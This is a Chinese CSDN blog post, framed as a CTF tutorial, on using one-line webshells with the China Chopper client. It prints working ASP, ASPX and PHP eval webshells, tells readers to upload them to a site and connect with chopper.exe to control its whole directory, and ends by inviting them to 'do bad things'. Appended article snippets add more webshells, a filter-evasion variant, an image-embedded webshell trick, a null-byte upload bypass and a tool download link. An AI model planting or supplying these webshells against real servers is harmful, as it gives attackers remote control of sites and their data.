CTF竞赛实战 中国菜刀与一句话木马

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量7.8w 收藏 79
点赞数 8
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxxslinyue/article/details/79397973
版权

 

一.基本操作:

往目标CTF提供的网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录,从而获取Flag,首先需要明确的是,中国菜刀本身是一个病毒,会被你的360或者其他软件监测到,希望不要误以为这是恶意软件。

二.实战

 

asp的一句话是:

<%eval request ("pass")%>

aspx的一句话是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句话是:

<?php @eval($_POST['pass']);?>

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

下面举个小例子:

然后假设我们有个智障网站有这样的漏洞:

我们把这个lubr.php上传上去后,打开chopper.exe

连接到这个网址下我们的菜刀文件上,右键点击文件管理,就可以获取整个网站的目录了~然后就可以开始做坏事。

 

Hugo5332
关注
  • 8
    点赞
  • 79
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
菜刀一句话木马
weixin_44720762的博客
05-02 3813
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 6780
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
CTFweb篇-一句话木马
weixin_44597701的博客
08-05 5432
什么是一句话木马 一句话木马就是将一段代码植入服务器中,然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 一句话木马的条件 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 例题 先用御剑扫描一下 发现后台地址 然后进入输入root 密码空(至于为什
java安全——jsp一句话木马
Innocence_0的博客
05-30 620
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
tmzy1的博客
03-24 3607
上传漏洞(一句话木马中国菜刀使用、DVWA文件上传漏洞利用)
菜刀连接图片一句话木马
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
文件上传漏洞详解(CTF篇)
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件上传: 文件上传就是通过流的方式将文件写到服务器上 文件上传必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马
一句话木马上传常见的几种方法
热门推荐
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5601
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
中国传媒大学 CTF 竞赛组织.zip
01-14
许多竞赛项目需要团队协作来完成,这促使学生学会有效地与他人合作、协调分工。在团队合作中,学生们能够学到如何有效沟通、共同制定目标和分工合作,这对于日后进入职场具有重要意义。 此外,学科竞赛是提高学生...
一款针对CTF竞赛MISC的工具~.zip
最新发布
07-20
【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。 【项目质量】:所有源码都经过测试,可以直接运行。功能在确认正常工作后才上传。 ...
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6472
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
CTF】BugkuCTF - 分析 - 中国菜刀
干铮的博客
08-08 648
下载caidao.zip 解压文件用wireshark分析 查看HTTP状态码,200OK这个包,看出有一个txt文件在里面。 之后用kali里的工具binwalk将文件拆分出来 binwalk -e caidao.pcapng
渗透测试工具
qq_43613772的博客
07-15 1371
一部分渗透测试工具 1、nmap:一款开源免费的网络发现和安全审计工具。 基本功能:主机发现、端口扫描、版本侦测、操作系统侦测 然后就是了解一定的常用参数 以往的文章里面有介绍,这里不再一一阐述 2、SQLMAP:可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。 在其后输入help可以进行查找其一些参数和介绍。 3、burpsuite:是用于攻击web 应用程序的集成平台,包含...
中国菜刀一句话木马之间的原理分析
qq_43592994的博客
05-28 3798
参考文章 https://blog.csdn.net/gscaiyucheng/article/details/24911375 http://www.ifuryst.com/archives/caidao.html https://www.yongshen.me/index.php/archives/1199.html 0x00前言 前段时间在做sql注入实验室的时候 需要用到 dump int...
中国菜刀(chopper)官网原版下载!强烈鄙视那些发布所谓过狗菜刀的人!
weixin_33711647的博客
12-30 7905
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。 只要支持动态脚本的网站[如php/jsp/aspx/asp/cfm/ruby/cgi/python/perl等等],都可以用中国菜刀来进行管理! 常用功能: 文件管理,虚拟终端,数据库管理,自写脚本。 其它功能: Web浏览器(POST浏览/自定义/执行自定义JS代/定时刷新); 网站爬行(自动保存...
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
CTF 竞赛入门指南
09-27
CTF竞赛入门指南是一个很广泛的话题,其中包含了很多方面的知识和技能。作为一个入门指南,我将提供一些基本的信息和学习资源,以帮助您开始进入CTF竞赛。 1. 了解CTF竞赛CTF(Capture The Flag)是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能。参赛者需要通过解决一系列的难题来获得旗帜(flag),并提交给竞赛组织者。 2. 学习基本概念:在参加CTF竞赛之前,您需要了解一些基本的概念和技术,如二进制、网络、密码学、漏洞利用等。您可以通过阅读相关的书籍、教程和在线资源来学习这些知识。 3. 刷题和实践:刷题是提高CTF竞赛技能的重要方法。您可以通过解决一些经典的CTF题目来提高自己的技能和经验。一些常见的CTF题目类型包括逆向工程、网络分析、密码学和漏洞利用等。您可以在网上找到一些CTF题库和平台来进行练习。 4. 参加CTF竞赛:一旦您掌握了一定的CTF技能,可以尝试参加一些线上或线下的CTF竞赛。通过参加竞赛,您可以与其他安全研究人员交流,学习和提高自己的技能。 5. 加入CTF社区:加入CTF社区是一个非常好的方式来与其他CTF爱好者交流和学习。在社区中,您可以分享自己的经验和知识,也可以从其他人那里获取帮助和指导。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值